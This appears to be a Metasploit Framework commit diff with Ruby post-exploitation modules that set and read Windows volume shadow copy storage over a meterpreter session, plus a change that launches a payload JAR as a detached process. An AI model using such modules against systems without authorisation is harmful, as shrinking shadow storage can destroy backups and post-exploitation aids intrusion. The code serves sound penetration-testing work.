require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Set Shadow Copy Storage Space",
'Description' => %q{
This module will attempt to change the ammount of space
for volume shadow copy storage. This is based on the
VSSOwn Script originally posted by Tim Tomes and
Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
))
register_options(
[
OptInt.new('SIZE', [ true, 'Size in bytes to set for Max Storage'])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
unless start_vss
return
end
if vss_set_storage(datastore['SIZE'])
print_good("Size upated successfully")
else
print_error("There was a problem updating the storage size")
end
end
end

View File

@ -0,0 +1,73 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Get Shadow Copy Storage Info",
'Description' => %q{
This module will attempt to get volume shadow copy storage info.
This is based on the VSSOwn Script originally posted by
Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
))
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
unless start_vss
return
end
storage_data = vss_get_storage
if storage_data
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Shadow Copy Storage Data',
'Indent' => 1,
'Columns' => ['Field', 'Value']
)
storage_data.each_pair{|k,v| tbl << [k,v]}
print_good(tbl.to_s)
store_loot(
'host.shadowstorage',
'text/plain',
session,
tbl.to_s,
'shadowstorage.txt',
'Shadow Copy Storage Info'
)
end
end
end

View File

@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
fd.write(@jar_data)
end
framework.threads.spawn("Module(#{self.refname})-JavaLauncher", false) { system("java -jar payload.jar") }
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end